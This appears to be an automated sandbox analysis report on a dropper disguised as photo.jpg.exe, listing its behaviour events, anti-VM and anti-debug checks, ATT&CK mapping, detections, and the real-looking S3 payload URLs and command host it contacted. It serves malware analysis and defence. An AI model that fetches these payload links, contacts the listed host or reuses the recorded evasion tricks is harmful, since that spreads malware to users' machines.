Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeMemory allocated: 8E0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeMemory allocated: 26B0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeMemory allocated: A00000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeWindow / User API: threadDelayed 2554Jump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeWindow / User API: threadDelayed 7281Jump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exe TID: 3040Thread sleep time: -22136092888451448s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exe TID: 3040Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exe TID: 6232Thread sleep count: 2554 > 30Jump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exe TID: 6232Thread sleep count: 7281 > 30Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeFile opened: C:\Users\userJump to behavior
Source: TASLogin.exe, 00000019.00000002.1533709727.00000000006E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}a3
Source: TASLogin.exe, 00000019.00000002.1533709727.00000000006E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: TASLogin.exe, 00000014.00000002.1454050456.0000000000578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: TASLogin.exe, 00000014.00000002.1454050456.0000000000578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b};
Source: photo.jpg.exe, 00000000.00000002.1337389667.0000000005E05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:MA
Source: photo.jpg.exe, 00000000.00000002.1324529798.000000000097E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
Source: TASLogin.exe, 0000000E.00000002.1346273792.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, TASLogin.exe, 00000014.00000002.1454050456.0000000000578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess created: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe "C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe" Jump to behavior
Source: TASLogin.exe, 0000000E.00000002.1347476930.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, TASLogin.exe, 0000000E.00000003.1324625603.000000007F610000.00000004.00001000.00020000.00000000.sdmp, TASLogin.exe, 0000000E.00000002.1349071706.000000007F090000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndTrayNotifyWndSysPagerToolbarWindow32
Source: TASLogin.exe, 0000000E.00000002.1347476930.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, TASLogin.exe, 0000000E.00000003.1324625603.000000007F610000.00000004.00001000.00020000.00000000.sdmp, TASLogin.exe, 0000000E.00000002.1349071706.000000007F090000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: |SysPagerTrayNotifyWndShell_TrayWnd
Source: TASLogin.exe, 0000000E.00000002.1347476930.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, TASLogin.exe, 0000000E.00000003.1324625603.000000007F610000.00000004.00001000.00020000.00000000.sdmp, TASLogin.exe, 0000000E.00000002.1349071706.000000007F090000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: |ProgMan
Source: C:\Users\user\Desktop\photo.jpg.exeQueries volume information: C:\Users\user\Desktop\photo.jpg.exe VolumeInformationJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Scheduled Task/Job		1
Scheduled Task/Job		12
Process Injection		11
Masquerading		OS Credential Dumping111
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder		1
Scheduled Task/Job		1
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading		1
Registry Run Keys / Startup Folder		41
Virtualization/Sandbox Evasion		Security Account Manager41
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading		12
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Obfuscated Files or Information		LSA Secrets2
File and Directory Discovery		SSHKeylogging3
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
Software Packing		Cached Domain Credentials22
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1654778 Sample: photo.jpg.pif Startdate: 02/04/2025 Architecture: WINDOWS Score: 80 41 u.arpuu.com 2->41 43 s3-r-w.ap-southeast-1.amazonaws.com 2->43 45 imagesyd.s3.ap-southeast-1.amazonaws.com 2->45 53 Antivirus / Scanner detection for submitted sample 2->53 55 Multi AV Scanner detection for dropped file 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 4 other signatures 2->59 8 photo.jpg.exe 15 11 2->8         started        12 TASLogin.exe 1 2->12         started        14 TASLogin.exe 1 2->14         started        signatures3 process4 dnsIp5 47 3.5.146.183, 443, 49698, 49701 AMAZON-02US United States 8->47 49 3.5.150.100, 443, 49689, 49691 AMAZON-02US United States 8->49 51 4 other IPs or domains 8->51 31 C:\Users\user\...\commonbase.dll, PE32 8->31 dropped 33 C:\Users\user\AppData\...\photo.jpg.exe.log, CSV 8->33 dropped 35 C:\Users\user\...\TASLoginBase.dll, PE32 8->35 dropped 37 C:\Users\user\...\TASLogin.exe, PE32 8->37 dropped 16 TASLogin.exe 2 7 8->16         started        19 WerFault.exe 4 12->19         started        21 WerFault.exe 4 12->21         started        23 WerFault.exe 4 14->23         started        25 WerFault.exe 4 14->25         started        file6 process7 dnsIp8 39 u.arpuu.com 13.208.251.115, 3158, 49709, 49711 AMAZON-02US United States 16->39 27 WerFault.exe 2 16->27         started        29 WerFault.exe 2 16->29         started        process9

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
photo.jpg.exe35%VirustotalBrowse
photo.jpg.exe100%AviraTR/Dropper.Gen
SAMPLE100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe3%ReversingLabs
C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\commonbase.dll39%ReversingLabsWin32.Adware.RedCap

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://imagesyd.s3.ap-southeast-1.amazonaws.com0%Avira URL Cloudsafe
https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.exep0%Avira URL Cloudsafe
https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.exe0%Avira URL Cloudsafe
https://imagesyd.s3.ap-southeast-1.amazonaws.com/image.jpg0%Avira URL Cloudsafe
https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.edskv0%Avira URL Cloudsafe
http://imagesyd.s3.ap-southeast-1.amazonaws.comp0%Avira URL Cloudsafe
https://imagesyd.s3.ap-southeast-1.amazonaws.com0%Avira URL Cloudsafe
https://imagesyd.s3.ap-southeast-1.amazonaws.com/uu.txt0%Avira URL Cloudsafe
http://imagesyd.s3.ap-southeast-1.amazonaws.comd0%Avira URL Cloudsafe
http://s3-r-w.ap-southeast-1.amazonaws.comd0%Avira URL Cloudsafe
https://imagesyd.s3.ap-southeast-1.amazonaws.com/image.jpgt-Nr0%Avira URL Cloudsafe
https://imagesyd.s3.ap-southeast-1.amazonaws.com/image.jpgd0%Avira URL Cloudsafe
https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.txt0%Avira URL Cloudsafe
https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLoginBase.dll0%Avira URL Cloudsafe
https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.exed0%Avira URL Cloudsafe
https://imagesyd.s3.ap-southeast-1.amazonaws.com/commonbase.dlld0%Avira URL Cloudsafe
https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLoginBase.dlld0%Avira URL Cloudsafe
https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.exex0%Avira URL Cloudsafe
https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.txtd0%Avira URL Cloudsafe
https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.edskvd0%Avira URL Cloudsafe
https://imagesyd.s3.ap-southeast-1.amazonaws.comD0%Avira URL Cloudsafe
https://imagesyd.s3.ap-southeast-1.amazonaws.com/commonbase.dll0%Avira URL Cloudsafe

Domains and IPs

Download Network PCAP: filteredfull

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
s3-r-w.ap-southeast-1.amazonaws.com
3.5.150.219
truefalse
    		high
    u.arpuu.com
    		13.208.251.115
    		truefalse
      		high
